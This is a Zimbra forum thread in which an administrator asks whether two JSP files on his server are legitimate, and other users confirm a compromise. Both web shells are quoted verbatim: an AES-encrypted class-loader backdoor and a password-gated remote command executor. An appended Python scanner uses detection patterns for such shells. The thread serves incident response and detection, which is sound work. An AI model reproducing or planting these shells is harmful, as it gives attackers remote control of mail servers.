XZimbra.jsp and AJAX.jsp

mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

XZimbra.jsp and AJAX.jsp

Post by mqaroush »

Hello,
Are these files Zimbra files, or scripts created by a hacker?
/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp, and its content is:

Code:

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(
pageContext);%>
/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp, and its content is:

Code:

<%if("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>

mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: XZimbra.jsp and AJAX.jsp

Post by mqaroush »

More about them:

Code:

 stat /opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
  File: `/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp'
  Size: 651             Blocks: 8          IO Block: 4096   regular file
Device: fd04h/64772d    Inode: 90579419    Links: 1
Access: (0640/-rw-r-----)  Uid: (  496/  zimbra)   Gid: (  493/  zimbra)
Access: 2019-05-13 10:32:06.979040738 +0300
Modify: 2019-05-06 08:45:01.300197279 +0300
Change: 2019-05-06 08:45:01.300197279 +0300
 
and

Code:

 stat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
  File: `/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp'
  Size: 351             Blocks: 8          IO Block: 4096   regular file
Device: fd04h/64772d    Inode: 90579420    Links: 1
Access: (0640/-rw-r-----)  Uid: (  496/  zimbra)   Gid: (  493/  zimbra)
Access: 2019-05-14 10:31:38.332031927 +0300
Modify: 2019-05-08 09:59:27.755179196 +0300
Change: 2019-05-08 09:59:27.755179196 +0300
 
Bittone
Posts: 21
Joined: Mon Sep 05, 2016 4:30 pm

Re: XZimbra.jsp and AJAX.jsp

Post by Bittone »

Hello mqaroush,
Bad news: you have been hacked.
Good news: here you can find everything you need to clean up your server: viewtopic.php?f=15&t=65932
Now, as a best practice, you should migrate everything to a new VM/server, but in some cases that's not feasible, so... good luck.
Bye
A.T.
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: XZimbra.jsp and AJAX.jsp

Post by mqaroush »

Are they Zimbra files edited by the hacker, or new files created by the hackers?
Can I delete those files or not?
Bittone
Posts: 21
Joined: Mon Sep 05, 2016 4:30 pm

Re: XZimbra.jsp and AJAX.jsp

Post by Bittone »

Hello mqaroush,
Unfortunately there is no easy answer, since the hack is more complex than just two files, so you MUST read the whole thread in order to fully understand how far the hack went.
Deleting a couple of files is NOT the answer you are looking for, since without the other necessary actions it will leave your system open to future hacks.
So you must:
1) read the thread (and you will learn many things by doing so);
2) understand in what form your system was compromised;
3) fix and patch your system in order not to be a target any more.
Bye

A.T.
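A triage scan a defender could run over the webapps tree, as an added example that is not code from this thread or from Zimbra: it flags .jsp files that use the primitives the two pages above rely on (shell execution, runtime class definition, AES-wrapped payloads) and reports each hit's mtime for comparison with the stat output. The root path and the optional baseline date are assumptions; the two sample strings are constructed for the self-test and are not working pages.

```python
"""Triage scanner for JSP web shells under a Zimbra jetty webapps tree.
Added example, not from the thread or from Zimbra: flags .jsp files that use
primitives the two shells above rely on and reports their mtime so they can be
compared with the stat output.  Root path and baseline date are assumptions."""
import os
import re
import sys
from datetime import datetime, timezone

DEFAULT_ROOT = "/opt/zimbra/jetty/webapps"  # webapp root as used in the thread

# Primitives a legitimate JSP view page should never need on its own.
INDICATORS = {
    "shell_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\("),
    "process_builder": re.compile(r"new\s+ProcessBuilder\s*\("),
    "define_class": re.compile(r"\bdefineClass\s*\("),
    "aes_cipher": re.compile(r"Cipher\.getInstance\s*\(\s*\"AES"),
    "base64_decode": re.compile(r"BASE64Decoder|Base64\.getDecoder"),
}

# Constructed samples for the self-test; neither is a functional page.
SAMPLE_CLEAN = '<%@ page contentType="text/html" %><% out.print(new java.util.Date()); %>'
SAMPLE_SUSPECT = '<% Cipher.getInstance("AES"); loader.defineClass(b, 0, b.length); %>'


def scan_jsp_text(text):
    """Return the sorted indicator names present in one JSP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root=DEFAULT_ROOT, baseline=None):
    """Yield (path, mtime_utc, indicators) for each .jsp that trips a rule.
    With an aware `baseline` datetime, files not modified since it are skipped
    so triage concentrates on what changed after the last known-good state."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".jsp"):
                continue
            path = os.path.join(dirpath, fn)
            mtime = datetime.fromtimestamp(os.stat(path).st_mtime, timezone.utc)
            if baseline is not None and mtime < baseline:
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_jsp_text(fh.read())
            if hits:
                yield path, mtime, hits


if __name__ == "__main__":
    for path, mtime, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else DEFAULT_ROOT):
        print(f"{mtime.isoformat()}  {path}  {','.join(hits)}")
```

Any hit should be compared against a clean copy of the same Zimbra release before deletion, since the thread's point is that the two files are symptoms and the whole host needs review.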